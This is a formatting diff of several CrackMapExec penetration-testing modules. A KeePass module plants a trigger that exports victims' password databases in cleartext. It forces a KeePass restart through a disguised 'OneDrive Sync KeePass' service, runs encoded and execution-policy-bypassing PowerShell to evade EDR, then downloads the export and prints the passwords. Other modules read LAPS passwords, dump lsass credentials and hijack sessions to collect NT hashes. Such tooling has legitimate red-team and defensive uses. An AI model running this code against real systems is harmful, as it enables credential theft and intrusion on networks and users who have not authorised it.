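    rows = reader(raw_output.split("\n"), delimiter=",")
    next(rows)  # skip the CSV header line emitted by ConvertTo-CSV
    return [row for row in rows if row]  # drop empty trailing lines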
supported_protocols = ["smb"] # while the module only executes legit powershell commands on the target (search and edit files) # some EDR like Trend Micro flag base64-encoded powershell as malicious @@ -42,27 +40,19 @@ class CMEModule: # additional parameters self.share = "C$" self.remote_temp_script_path = "C:\\Windows\\Temp\\temp.ps1" - self.keepass_binary_path = ( - "C:\\Program Files\\KeePass Password Safe 2\\KeePass.exe" - ) + self.keepass_binary_path = "C:\\Program Files\\KeePass Password Safe 2\\KeePass.exe" self.local_export_path = "/tmp" self.trigger_name = "export_database" self.poll_frequency_seconds = 5 self.dummy_service_name = "OneDrive Sync KeePass" - with open( - get_ps_script("keepass_trigger_module/RemoveKeePassTrigger.ps1"), "r" - ) as remove_trigger_script_file: + with open(get_ps_script("keepass_trigger_module/RemoveKeePassTrigger.ps1"), "r") as remove_trigger_script_file: self.remove_trigger_script_str = remove_trigger_script_file.read() - with open( - get_ps_script("keepass_trigger_module/AddKeePassTrigger.ps1"), "r" - ) as add_trigger_script_file: + with open(get_ps_script("keepass_trigger_module/AddKeePassTrigger.ps1"), "r") as add_trigger_script_file: self.add_trigger_script_str = add_trigger_script_file.read() - with open( - get_ps_script("keepass_trigger_module/RestartKeePass.ps1"), "r" - ) as restart_keepass_script_file: + with open(get_ps_script("keepass_trigger_module/RestartKeePass.ps1"), "r") as restart_keepass_script_file: self.restart_keepass_script_str = restart_keepass_script_file.read() def options(self, context, module_options): @@ -107,16 +97,12 @@ class CMEModule: "CLEAN", "ALL", ]: - context.log.fail( - "Unrecognized action, use --options to list available parameters" - ) + context.log.fail("Unrecognized action, use --options to list available parameters") exit(1) else: self.action = module_options["ACTION"] else: - context.log.fail( - "Missing ACTION option, use --options to list available parameters" - ) + context.log.fail("Missing ACTION option, use --options to list available parameters") exit(1) if "KEEPASS_CONFIG_PATH" in module_options: @@ -133,9 +119,7 @@ class CMEModule: if "PSH_EXEC_METHOD" in module_options: if module_options["PSH_EXEC_METHOD"] not in ["ENCODE", "PS1"]: - context.log.fail( - "Unrecognized powershell execution method, use --options to list available parameters" - ) + context.log.fail("Unrecognized powershell execution method, use --options to list available parameters") exit(1) else: self.powershell_exec_method = module_options["PSH_EXEC_METHOD"] @@ -160,54 +144,34 @@ class CMEModule: # check if the specified KeePass configuration file exists if self.trigger_added(context, connection): - context.log.display( - f"The specified configuration file {self.keepass_config_path} already contains a trigger called '{self.trigger_name}', skipping" - ) + context.log.display(f"The specified configuration file {self.keepass_config_path} already contains a trigger called '{self.trigger_name}', skipping") return - context.log.display( - f"Adding trigger '{self.trigger_name}' to '{self.keepass_config_path}'" - ) + context.log.display(f"Adding trigger '{self.trigger_name}' to '{self.keepass_config_path}'") # prepare the trigger addition script based on user-specified parameters (e.g: trigger name, etc) # see data/keepass_trigger_module/AddKeePassTrigger.ps1 for the full script - self.add_trigger_script_str = self.add_trigger_script_str.replace( - "REPLACE_ME_ExportPath", self.export_path - ) - self.add_trigger_script_str = 
self.add_trigger_script_str.replace( - "REPLACE_ME_ExportName", self.export_name - ) - self.add_trigger_script_str = self.add_trigger_script_str.replace( - "REPLACE_ME_TriggerName", self.trigger_name - ) - self.add_trigger_script_str = self.add_trigger_script_str.replace( - "REPLACE_ME_KeePassXMLPath", self.keepass_config_path - ) + self.add_trigger_script_str = self.add_trigger_script_str.replace("REPLACE_ME_ExportPath", self.export_path) + self.add_trigger_script_str = self.add_trigger_script_str.replace("REPLACE_ME_ExportName", self.export_name) + self.add_trigger_script_str = self.add_trigger_script_str.replace("REPLACE_ME_TriggerName", self.trigger_name) + self.add_trigger_script_str = self.add_trigger_script_str.replace("REPLACE_ME_KeePassXMLPath", self.keepass_config_path) # add the malicious trigger to the remote KeePass configuration file if self.powershell_exec_method == "ENCODE": - add_trigger_script_b64 = b64encode( - self.add_trigger_script_str.encode("UTF-16LE") - ).decode("utf-8") + add_trigger_script_b64 = b64encode(self.add_trigger_script_str.encode("UTF-16LE")).decode("utf-8") add_trigger_script_cmd = f"powershell.exe -e {add_trigger_script_b64}" connection.execute(add_trigger_script_cmd) - sleep( - 2 - ) # as I noticed some delay may happen with the encoded powershell command execution + sleep(2) # as I noticed some delay may happen with the encoded powershell command execution elif self.powershell_exec_method == "PS1": try: - self.put_file_execute_delete( - context, connection, self.add_trigger_script_str - ) + self.put_file_execute_delete(context, connection, self.add_trigger_script_str) except Exception as e: context.log.fail(f"Error while adding malicious trigger to file: {e}") sys.exit(1) # checks if the malicious trigger was effectively added to the specified KeePass configuration file if self.trigger_added(context, connection): - context.log.success( - f"Malicious trigger successfully added, you can now wait for KeePass reload and poll the exported files" - ) + context.log.success(f"Malicious trigger successfully added, you can now wait for KeePass reload and poll the exported files") else: context.log.fail(f"Unknown error when adding malicious trigger to file") sys.exit(1) @@ -216,13 +180,9 @@ class CMEModule: """check if the trigger is added to the config file XML tree""" if self.trigger_added(context, connection): - context.log.display( - f"Malicious trigger '{self.trigger_name}' found in '{self.keepass_config_path}'" - ) + context.log.display(f"Malicious trigger '{self.trigger_name}' found in '{self.keepass_config_path}'") else: - context.log.display( - f"No trigger '{self.trigger_name}' found in '{self.keepass_config_path}'" - ) + context.log.display(f"No trigger '{self.trigger_name}' found in '{self.keepass_config_path}'") def restart(self, context, connection): """Force the restart of KeePass process using a Windows service defined using the powershell script RestartKeePass.ps1 @@ -231,13 +191,9 @@ class CMEModule: # search for keepass processes search_keepass_process_command_str = 'powershell.exe "Get-Process keepass* -IncludeUserName | Select-Object -Property Id,UserName,ProcessName | ConvertTo-CSV -NoTypeInformation"' - search_keepass_process_output_csv = connection.execute( - search_keepass_process_command_str, True - ) + search_keepass_process_output_csv = connection.execute(search_keepass_process_command_str, True) # we return the powershell command as a CSV for easier column parsing - csv_reader = reader( - 
search_keepass_process_output_csv.split("\n"), delimiter="," - ) + csv_reader = reader(search_keepass_process_output_csv.split("\n"), delimiter=",") next(csv_reader) # to skip the header line keepass_process_list = list(csv_reader) # check if multiple processes belonging to different users are running (in order to choose which one to restart) @@ -249,64 +205,40 @@ class CMEModule: return elif len(keepass_users) == 1: # if there is only 1 KeePass process running # if KEEPASS_USER option is specified then we check if the user matches - if self.keepass_user and ( - keepass_users[0] != self.keepass_user - and keepass_users[0].split("\\")[1] != self.keepass_user - ): - context.log.fail( - f"Specified user {self.keepass_user} does not match any KeePass process owner, aborting restart" - ) + if self.keepass_user and (keepass_users[0] != self.keepass_user and keepass_users[0].split("\\")[1] != self.keepass_user): + context.log.fail(f"Specified user {self.keepass_user} does not match any KeePass process owner, aborting restart") return else: self.keepass_user = keepass_users[0] elif len(keepass_users) > 1 and self.keepass_user: found_user = False # we search through every KeePass process owner for the specified user for user in keepass_users: - if ( - user == self.keepass_user - or user.split("\\")[1] == self.keepass_user - ): + if user == self.keepass_user or user.split("\\")[1] == self.keepass_user: self.keepass_user = keepass_users[0] found_user = True if not found_user: - context.log.fail( - f"Specified user {self.keepass_user} does not match any KeePass process owner, aborting restart" - ) + context.log.fail(f"Specified user {self.keepass_user} does not match any KeePass process owner, aborting restart") return else: - context.log.fail( - "Multiple KeePass processes were found, please specify parameter USER to target one" - ) + context.log.fail("Multiple KeePass processes were found, please specify parameter USER to target one") return context.log.display("Restarting {}'s KeePass process".format(keepass_users[0])) # prepare the restarting script based on user-specified parameters (e.g: keepass user, etc) # see data/keepass_trigger_module/RestartKeePass.ps1 - self.restart_keepass_script_str = self.restart_keepass_script_str.replace( - "REPLACE_ME_KeePassUser", self.keepass_user - ) - self.restart_keepass_script_str = self.restart_keepass_script_str.replace( - "REPLACE_ME_KeePassBinaryPath", self.keepass_binary_path - ) - self.restart_keepass_script_str = self.restart_keepass_script_str.replace( - "REPLACE_ME_DummyServiceName", self.dummy_service_name - ) + self.restart_keepass_script_str = self.restart_keepass_script_str.replace("REPLACE_ME_KeePassUser", self.keepass_user) + self.restart_keepass_script_str = self.restart_keepass_script_str.replace("REPLACE_ME_KeePassBinaryPath", self.keepass_binary_path) + self.restart_keepass_script_str = self.restart_keepass_script_str.replace("REPLACE_ME_DummyServiceName", self.dummy_service_name) # actually performs the restart on the remote target if self.powershell_exec_method == "ENCODE": - restart_keepass_script_b64 = b64encode( - self.restart_keepass_script_str.encode("UTF-16LE") - ).decode("utf-8") - restart_keepass_script_cmd = "powershell.exe -e {}".format( - restart_keepass_script_b64 - ) + restart_keepass_script_b64 = b64encode(self.restart_keepass_script_str.encode("UTF-16LE")).decode("utf-8") + restart_keepass_script_cmd = "powershell.exe -e {}".format(restart_keepass_script_b64) connection.execute(restart_keepass_script_cmd) elif 
self.powershell_exec_method == "PS1": try: - self.put_file_execute_delete( - context, connection, self.restart_keepass_script_str - ) + self.put_file_execute_delete(context, connection, self.restart_keepass_script_str) except Exception as e: context.log.fail("Error while restarting KeePass: {}".format(e)) return @@ -315,28 +247,18 @@ class CMEModule: """Search for the cleartext database export file in the specified export folder (until found, or manually exited by the user)""" found = False - context.log.display( - f"Polling for database export every {self.poll_frequency_seconds} seconds, please be patient" - ) - context.log.display( - "we need to wait for the target to enter his master password ! Press CTRL+C to abort and use clean option to cleanup everything" - ) + context.log.display(f"Polling for database export every {self.poll_frequency_seconds} seconds, please be patient") + context.log.display("we need to wait for the target to enter his master password ! Press CTRL+C to abort and use clean option to cleanup everything") # if the specified path is %APPDATA%, we need to check in every user's folder if self.export_path == "%APPDATA%" or self.export_path == "%appdata%": - poll_export_command_str = "powershell.exe \"Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output ('C:\\Users\\'+$_.Name+'\\AppData\\Roaming\\{}')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}\"".format( - self.export_name - ) + poll_export_command_str = "powershell.exe \"Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output ('C:\\Users\\'+$_.Name+'\\AppData\\Roaming\\{}')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}\"".format(self.export_name) else: export_full_path = f"'{self.export_path}\\{self.export_name}'" - poll_export_command_str = 'powershell.exe "if (Test-Path {} -PathType leaf){{ Write-Output {} }}"'.format( - export_full_path, export_full_path - ) + poll_export_command_str = 'powershell.exe "if (Test-Path {} -PathType leaf){{ Write-Output {} }}"'.format(export_full_path, export_full_path) # we poll every X seconds until the export path is found on the remote machine while not found: - poll_exports_command_output = connection.execute( - poll_export_command_str, True - ) + poll_exports_command_output = connection.execute(poll_export_command_str, True) if self.export_name not in poll_exports_command_output: print(".", end="", flush=True) sleep(self.poll_frequency_seconds) @@ -346,119 +268,73 @@ class CMEModule: # once a database is found, downloads it to the attackers machine context.log.success("Found database export !") # in case multiple exports found (may happen if several users exported the database to their APPDATA) - for count, export_path in enumerate( - poll_exports_command_output.split("\r\n") - ): + for count, export_path in enumerate(poll_exports_command_output.split("\r\n")): try: buffer = BytesIO() - connection.conn.getFile( - self.share, export_path.split(":")[1], buffer.write - ) + connection.conn.getFile(self.share, export_path.split(":")[1], buffer.write) # if multiple exports found, add a number at the end of local path to prevent override if count > 0: - local_full_path = ( - self.local_export_path - + "/" - + self.export_name.split(".")[0] - + "_" - + str(count) - + "." - + self.export_name.split(".")[1] - ) + local_full_path = self.local_export_path + "/" + self.export_name.split(".")[0] + "_" + str(count) + "." 
+ self.export_name.split(".")[1] else: - local_full_path = ( - self.local_export_path + "/" + self.export_name - ) + local_full_path = self.local_export_path + "/" + self.export_name # downloads the exported database with open(local_full_path, "wb") as f: f.write(buffer.getbuffer()) - remove_export_command_str = "powershell.exe Remove-Item {}".format( - export_path - ) + remove_export_command_str = "powershell.exe Remove-Item {}".format(export_path) connection.execute(remove_export_command_str, True) - context.log.success( - 'Moved remote "{}" to local "{}"'.format( - export_path, local_full_path - ) - ) + context.log.success('Moved remote "{}" to local "{}"'.format(export_path, local_full_path)) found = True except Exception as e: - context.log.fail( - "Error while polling export files, exiting : {}".format(e) - ) + context.log.fail("Error while polling export files, exiting : {}".format(e)) def clean(self, context, connection): """Checks for database export + malicious trigger on the remote host, removes everything""" # if the specified path is %APPDATA%, we need to check in every user's folder if self.export_path == "%APPDATA%" or self.export_path == "%appdata%": - poll_export_command_str = "powershell.exe \"Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output ('C:\\Users\\'+$_.Name+'\\AppData\\Roaming\\{}')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}\"".format( - self.export_name - ) + poll_export_command_str = "powershell.exe \"Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output ('C:\\Users\\'+$_.Name+'\\AppData\\Roaming\\{}')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}\"".format(self.export_name) else: export_full_path = f"'{self.export_path}\\{self.export_name}'" - poll_export_command_str = 'powershell.exe "if (Test-Path {} -PathType leaf){{ Write-Output {} }}"'.format( - export_full_path, export_full_path - ) + poll_export_command_str = 'powershell.exe "if (Test-Path {} -PathType leaf){{ Write-Output {} }}"'.format(export_full_path, export_full_path) poll_export_command_output = connection.execute(poll_export_command_str, True) # deletes every export found on the remote machine if self.export_name in poll_export_command_output: # in case multiple exports found (may happen if several users exported the database to their APPDATA) for export_path in poll_export_command_output.split("\r\n"): - context.log.display( - f"Database export found in '{export_path}', removing" - ) + context.log.display(f"Database export found in '{export_path}', removing") remove_export_command_str = f"powershell.exe Remove-Item {export_path}" connection.execute(remove_export_command_str, True) else: - context.log.display( - f"No export found in {self.export_path} , everything is cleaned" - ) + context.log.display(f"No export found in {self.export_path} , everything is cleaned") # if the malicious trigger was not self-deleted, deletes it if self.trigger_added(context, connection): # prepare the trigger deletion script based on user-specified parameters (e.g: trigger name, etc) # see data/keepass_trigger_module/RemoveKeePassTrigger.ps1 - self.remove_trigger_script_str = self.remove_trigger_script_str.replace( - "REPLACE_ME_KeePassXMLPath", self.keepass_config_path - ) - self.remove_trigger_script_str = self.remove_trigger_script_str.replace( - "REPLACE_ME_TriggerName", self.trigger_name - ) + self.remove_trigger_script_str = 
self.remove_trigger_script_str.replace("REPLACE_ME_KeePassXMLPath", self.keepass_config_path) + self.remove_trigger_script_str = self.remove_trigger_script_str.replace("REPLACE_ME_TriggerName", self.trigger_name) # actually performs trigger deletion if self.powershell_exec_method == "ENCODE": - remove_trigger_script_b64 = b64encode( - self.remove_trigger_script_str.encode("UTF-16LE") - ).decode("utf-8") - remove_trigger_script_command_str = ( - f"powershell.exe -e {remove_trigger_script_b64}" - ) + remove_trigger_script_b64 = b64encode(self.remove_trigger_script_str.encode("UTF-16LE")).decode("utf-8") + remove_trigger_script_command_str = f"powershell.exe -e {remove_trigger_script_b64}" connection.execute(remove_trigger_script_command_str, True) elif self.powershell_exec_method == "PS1": try: - self.put_file_execute_delete( - context, connection, self.remove_trigger_script_str - ) + self.put_file_execute_delete(context, connection, self.remove_trigger_script_str) except Exception as e: context.log.fail(f"Error while deleting trigger, exiting: {e}") sys.exit(1) # check if the specified KeePass configuration file does not contain the malicious trigger anymore if self.trigger_added(context, connection): - context.log.fail( - f"Unknown error while removing trigger '{self.trigger_name}', exiting" - ) + context.log.fail(f"Unknown error while removing trigger '{self.trigger_name}', exiting") else: - context.log.display( - f"Found trigger '{self.trigger_name}' in configuration file, removing" - ) + context.log.display(f"Found trigger '{self.trigger_name}' in configuration file, removing") else: - context.log.success( - f"No trigger '{self.trigger_name}' found in '{self.keepass_config_path}', skipping" - ) + context.log.success(f"No trigger '{self.trigger_name}' found in '{self.keepass_config_path}', skipping") def all_in_one(self, context, connection): """Performs ADD, RESTART, POLL and CLEAN actions one after the other""" @@ -484,27 +360,19 @@ class CMEModule: try: buffer = BytesIO() - connection.conn.getFile( - self.share, self.keepass_config_path.split(":")[1], buffer.write - ) + connection.conn.getFile(self.share, self.keepass_config_path.split(":")[1], buffer.write) except Exception as e: - context.log.fail( - f"Error while getting file '{self.keepass_config_path}', exiting: {e}" - ) + context.log.fail(f"Error while getting file '{self.keepass_config_path}', exiting: {e}") sys.exit(1) try: keepass_config_xml_root = ElementTree.fromstring(buffer.getvalue()) except Exception as e: - context.log.fail( - f"Error while parsing file '{self.keepass_config_path}', exiting: {e}" - ) + context.log.fail(f"Error while parsing file '{self.keepass_config_path}', exiting: {e}") sys.exit(1) # check if the specified KeePass configuration file does not already contain the malicious trigger - for trigger in keepass_config_xml_root.findall( - ".//Application/TriggerSystem/Triggers/Trigger" - ): + for trigger in keepass_config_xml_root.findall(".//Application/TriggerSystem/Triggers/Trigger"): if trigger.find("Name").text == self.trigger_name: return True @@ -513,16 +381,10 @@ class CMEModule: def put_file_execute_delete(self, context, connection, psh_script_str): """Helper to upload script to a temporary folder, run then deletes it""" script_str_io = StringIO(psh_script_str) - connection.conn.putFile( - self.share, self.remote_temp_script_path.split(":")[1], script_str_io.read - ) - script_execute_cmd = "powershell.exe -ep Bypass -F {}".format( - self.remote_temp_script_path - ) + 
connection.conn.putFile(self.share, self.remote_temp_script_path.split(":")[1], script_str_io.read) + script_execute_cmd = "powershell.exe -ep Bypass -F {}".format(self.remote_temp_script_path) connection.execute(script_execute_cmd, True) - remove_remote_temp_script_cmd = 'powershell.exe "Remove-Item "{}""'.format( - self.remote_temp_script_path - ) + remove_remote_temp_script_cmd = 'powershell.exe "Remove-Item "{}""'.format(self.remote_temp_script_path) connection.execute(remove_remote_temp_script_cmd) def extract_password(self, context): @@ -538,15 +400,9 @@ class CMEModule: for obj2 in obj["KeePassFile"]["Root"]["Group"]["Entry"]: for password in obj2["String"]: if password["Key"] == "Password": - context.log.highlight( - str(password["Key"]) - + " : " - + str(password["Value"]["#text"]) - ) + context.log.highlight(str(password["Key"]) + " : " + str(password["Value"]["#text"])) else: - context.log.highlight( - str(password["Key"]) + " : " + str(password["Value"]) - ) + context.log.highlight(str(password["Key"]) + " : " + str(password["Value"])) context.log.highlight("") if len(obj["KeePassFile"]["Root"]["Group"]["Group"]): for obj2 in obj["KeePassFile"]["Root"]["Group"]["Group"]: @@ -554,17 +410,9 @@ class CMEModule: for obj3 in obj2["Entry"]: for password in obj3["String"]: if password["Key"] == "Password": - context.log.highlight( - str(password["Key"]) - + " : " - + str(password["Value"]["#text"]) - ) + context.log.highlight(str(password["Key"]) + " : " + str(password["Value"]["#text"])) else: - context.log.highlight( - str(password["Key"]) - + " : " - + str(password["Value"]) - ) + context.log.highlight(str(password["Key"]) + " : " + str(password["Value"])) context.log.highlight("") except KeyError: pass diff --git a/cme/modules/laps.py b/cme/modules/laps.py index 6bb49735..4329f771 100644 --- a/cme/modules/laps.py +++ b/cme/modules/laps.py @@ -33,11 +33,7 @@ class CMEModule: def on_login(self, context, connection): context.log.display("Getting LAPS Passwords") if self.computer is not None: - searchFilter = ( - "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*))(name=" - + self.computer - + "))" - ) + searchFilter = "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*))(name=" + self.computer + "))" else: searchFilter = "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*)))" attributes = [ @@ -47,46 +43,27 @@ class CMEModule: "sAMAccountName", ] results = connection.search(searchFilter, attributes, 0) - results = [ - r for r in results if isinstance(r, ldapasn1_impacket.SearchResultEntry) - ] + results = [r for r in results if isinstance(r, ldapasn1_impacket.SearchResultEntry)] if len(results) != 0: laps_computers = [] for computer in results: msMCSAdmPwd = "" sAMAccountName = "" - values = { - str(attr["type"]).lower(): str(attr["vals"][0]) - for attr in computer["attributes"] - } + values = {str(attr["type"]).lower(): str(attr["vals"][0]) for attr in computer["attributes"]} if "mslaps-encryptedpassword" in values: - context.log.fail( - "LAPS password is encrypted and currently CrackMapExec doesn't" - " support the decryption..." 
- ) + context.log.fail("LAPS password is encrypted and currently CrackMapExec doesn't" " support the decryption...") return elif "mslaps-password" in values: r = json.loads(values["mslaps-password"]) laps_computers.append((values["samaccountname"], r["n"], r["p"])) elif "ms-mcs-admpwd" in values: - laps_computers.append( - (values["samaccountname"], "", values["ms-mcs-admpwd"]) - ) + laps_computers.append((values["samaccountname"], "", values["ms-mcs-admpwd"])) else: - context.log.fail( - "No result found with attribute ms-MCS-AdmPwd or" - " msLAPS-Password" - ) + context.log.fail("No result found with attribute ms-MCS-AdmPwd or" " msLAPS-Password") laps_computers = sorted(laps_computers, key=lambda x: x[0]) for sAMAccountName, user, msMCSAdmPwd in laps_computers: - context.log.highlight( - "Computer: {:<20} User: {:<15} Password: {}".format( - sAMAccountName, user, msMCSAdmPwd - ) - ) + context.log.highlight("Computer: {:<20} User: {:<15} Password: {}".format(sAMAccountName, user, msMCSAdmPwd)) else: - context.log.fail( - "No result found with attribute ms-MCS-AdmPwd or msLAPS-Password !" - ) + context.log.fail("No result found with attribute ms-MCS-AdmPwd or msLAPS-Password !") diff --git a/cme/modules/ldap-checker.py b/cme/modules/ldap-checker.py index 94d2bb36..501151c7 100644 --- a/cme/modules/ldap-checker.py +++ b/cme/modules/ldap-checker.py @@ -22,9 +22,7 @@ class CMEModule: """ name = "ldap-checker" - description = ( - "Checks whether LDAP signing and binding are required and / or enforced" - ) + description = "Checks whether LDAP signing and binding are required and / or enforced" supported_protocols = ["ldap"] opsec_safe = True multiple_hosts = True @@ -53,9 +51,7 @@ class CMEModule: def run_ldaps_noEPA(inputUser, inputPassword, dcTarget): try: tls = ldap3.Tls(validate=ssl.CERT_NONE, version=ssl.PROTOCOL_TLSv1_2) - ldapServer = ldap3.Server( - dcTarget, use_ssl=True, port=636, get_info=ldap3.ALL, tls=tls - ) + ldapServer = ldap3.Server(dcTarget, use_ssl=True, port=636, get_info=ldap3.ALL, tls=tls) ldapConn = ldap3.Connection( ldapServer, user=inputUser, @@ -75,10 +71,7 @@ class CMEModule: exit() except Exception as e: context.log.fail("\n [!] " + dcTarget + " -", str(e)) - context.log.fail( - " * Ensure DNS is resolving properly, and that you can reach" - " LDAPS on this host" - ) + context.log.fail(" * Ensure DNS is resolving properly, and that you can reach" " LDAPS on this host") # Conduct a bind to LDAPS with channel binding supported # but intentionally miscalculated. In the case that and @@ -147,9 +140,7 @@ class CMEModule: ssl_sock.close() return False else: - context.log.fail( - "Unexpected error during LDAPS handshake: " + str(e) - ) + context.log.fail("Unexpected error during LDAPS handshake: " + str(e)) ssl_sock.close() return False @@ -157,9 +148,7 @@ class CMEModule: # requirements are enforced based on potential errors # during the bind attempt. 
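The run_ldap helper below reduces to a single unsigned NTLM bind against port 389, with enforcement inferred from the bind error. A minimal standalone sketch of that idea, assuming ldap3 is available and DOMAIN\user style credentials (the "stronger" substring match mirrors Active Directory's strongerAuthRequired error and is an approximation, not the module's exact logic):

import ldap3

def ldap_signing_enforced(dc_target, user, password):
    # Plain (unsigned) LDAP bind on 389: if the DC enforces signing, the NTLM
    # bind is rejected and the result mentions strongerAuthRequired (0x2028).
    server = ldap3.Server(dc_target, use_ssl=False, port=389, get_info=ldap3.ALL)
    conn = ldap3.Connection(server, user=user, password=password, authentication=ldap3.NTLM)
    if conn.bind():
        return False  # bind succeeded without signing, so signing is not enforced
    return "stronger" in str(conn.result)
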
def run_ldap(inputUser, inputPassword, dcTarget): - ldapServer = ldap3.Server( - dcTarget, use_ssl=False, port=389, get_info=ldap3.ALL - ) + ldapServer = ldap3.Server(dcTarget, use_ssl=False, port=389, get_info=ldap3.ALL) ldapConn = ldap3.Connection( ldapServer, user=inputUser, @@ -176,9 +165,7 @@ class CMEModule: context.log.debug("UNEXPECTED ERROR: " + str(ldapConn.result)) else: # LDAPS bind successful - return ( - False # because LDAP server signing requirements are not enforced - ) + return False # because LDAP server signing requirements are not enforced exit() # Run trough all our code blocks to determine LDAP signing and channel binding settings. @@ -190,23 +177,11 @@ class CMEModule: elif ldapIsProtected == True: context.log.fail("LDAP Signing IS Enforced") if DoesLdapsCompleteHandshake(dcTarget) == True: - ldapsChannelBindingAlwaysCheck = run_ldaps_noEPA( - inputUser, inputPassword, dcTarget - ) - ldapsChannelBindingWhenSupportedCheck = asyncio.run( - run_ldaps_withEPA(inputUser, inputPassword, dcTarget) - ) - if ( - ldapsChannelBindingAlwaysCheck == False - and ldapsChannelBindingWhenSupportedCheck == True - ): - context.log.highlight( - 'LDAPS Channel Binding is set to "When Supported"' - ) - elif ( - ldapsChannelBindingAlwaysCheck == False - and ldapsChannelBindingWhenSupportedCheck == False - ): + ldapsChannelBindingAlwaysCheck = run_ldaps_noEPA(inputUser, inputPassword, dcTarget) + ldapsChannelBindingWhenSupportedCheck = asyncio.run(run_ldaps_withEPA(inputUser, inputPassword, dcTarget)) + if ldapsChannelBindingAlwaysCheck == False and ldapsChannelBindingWhenSupportedCheck == True: + context.log.highlight('LDAPS Channel Binding is set to "When Supported"') + elif ldapsChannelBindingAlwaysCheck == False and ldapsChannelBindingWhenSupportedCheck == False: context.log.highlight('LDAPS Channel Binding is set to "NEVER"') elif ldapsChannelBindingAlwaysCheck == True: context.log.fail('LDAPS Channel Binding is set to "Required"') @@ -214,7 +189,4 @@ class CMEModule: context.log.fail("\nSomething went wrong...") exit() else: - context.log.fail( - dcTarget - + " - cannot complete TLS handshake, cert likely not configured" - ) + context.log.fail(dcTarget + " - cannot complete TLS handshake, cert likely not configured") diff --git a/cme/modules/lsassy_dump.py b/cme/modules/lsassy_dump.py index 47f73d18..4571f7a5 100644 --- a/cme/modules/lsassy_dump.py +++ b/cme/modules/lsassy_dump.py @@ -18,9 +18,7 @@ class CMEModule: name = "lsassy" description = "Dump lsass and parse the result remotely with lsassy" supported_protocols = ["smb"] - opsec_safe = ( - True # writes temporary files, and it's possible for them to not be deleted - ) + opsec_safe = True # writes temporary files, and it's possible for them to not be deleted multiple_hosts = True def __init__(self, context=None, module_options=None): @@ -85,13 +83,9 @@ class CMEModule: if deleted_file: context.log.debug(f"Deleted dumper file") else: - context.log.fail( - f"[OPSEC] No exception, but failed to delete file: {file_path}" - ) + context.log.fail(f"[OPSEC] No exception, but failed to delete file: {file_path}") except Exception as e: - context.log.fail( - f"[OPSEC] Error deleting temporary lsassy dumper file {file_path}: {e}" - ) + context.log.fail(f"[OPSEC] Error deleting temporary lsassy dumper file {file_path}: {e}") if credentials is None: credentials = [] @@ -100,13 +94,7 @@ class CMEModule: c = cred.get_object() context.log.debug(f"Cred: {c}") - credentials = [ - cred.get_object() - for cred in credentials - if cred.ticket is 
None - and cred.masterkey is None - and not cred.get_username().endswith("$") - ] + credentials = [cred.get_object() for cred in credentials if cred.ticket is None and cred.masterkey is None and not cred.get_username().endswith("$")] credentials_unique = [] credentials_output = [] context.log.debug(f"Credentials: {credentials}") @@ -141,10 +129,7 @@ class CMEModule: domain = None for cred in credentials: domain = cred["domain"] - if ( - "." not in cred["domain"] - and cred["domain"].upper() in connection.domain.upper() - ): + if "." not in cred["domain"] and cred["domain"].upper() in connection.domain.upper(): domain = connection.domain # slim shady self.save_credentials( context, @@ -163,9 +148,7 @@ class CMEModule: cred["lmhash"], cred["nthash"], ) - credz_bh.append( - {"username": cred["username"].upper(), "domain": domain.upper()} - ) + credz_bh.append({"username": cred["username"].upper(), "domain": domain.upper()}) add_user_bh(credz_bh, domain, context.log, connection.config) @staticmethod @@ -176,15 +159,11 @@ class CMEModule: context.log.highlight(output) @staticmethod - def save_credentials( - context, connection, domain, username, password, lmhash, nthash - ): + def save_credentials(context, connection, domain, username, password, lmhash, nthash): host_id = context.db.get_hosts(connection.host)[0][0] if password is not None: credential_type = "plaintext" else: credential_type = "hash" password = ":".join(h for h in [lmhash, nthash] if h is not None) - context.db.add_credential( - credential_type, domain, username, password, pillaged_from=host_id - ) + context.db.add_credential(credential_type, domain, username, password, pillaged_from=host_id) diff --git a/cme/modules/masky.py b/cme/modules/masky.py index 8c297100..c6d510b2 100644 --- a/cme/modules/masky.py +++ b/cme/modules/masky.py @@ -40,9 +40,7 @@ class CMEModule: def on_admin_login(self, context, connection): if not self.ca: - context.log.fail( - "Please provide a valid CA server and CA name (CA_SERVER\CA_NAME)" - ) + context.log.fail("Please provide a valid CA server and CA name (CA_SERVER\CA_NAME)") return False host = connection.host @@ -78,9 +76,7 @@ class CMEModule: if not tracker.nb_hijacked_users: context.log.display("No users' sessions were hijacked") else: - context.log.display( - f"{tracker.nb_hijacked_users} session(s) successfully hijacked" - ) + context.log.display(f"{tracker.nb_hijacked_users} session(s) successfully hijacked") context.log.display("Attempting to retrieve NT hash(es) via PKINIT") if not rslts: @@ -96,9 +92,7 @@ class CMEModule: if pwned_users: context.log.success(f"{pwned_users} NT hash(es) successfully collected") else: - context.log.fail( - "Unable to collect NT hash(es) from the hijacked session(s)" - ) + context.log.fail("Unable to collect NT hash(es) from the hijacked session(s)") return True def process_credentials(self, connection, context, user): @@ -121,17 +115,10 @@ class CMEModule: if not tracker.files_cleaning_success: context.log.fail("Fail to clean files related to Masky") - context.log.fail( - ( - f"Please remove the files named '{tracker.agent_filename}', '{tracker.error_filename}', " - f"'{tracker.output_filename}' & '{tracker.args_filename}' within the folder '\\Windows\\Temp\\'" - ) - ) + context.log.fail((f"Please remove the files named '{tracker.agent_filename}', '{tracker.error_filename}', " f"'{tracker.output_filename}' & '{tracker.args_filename}' within the folder '\\Windows\\Temp\\'")) ret = False if not tracker.svc_cleaning_success: - context.log.fail( - f"Fail to 
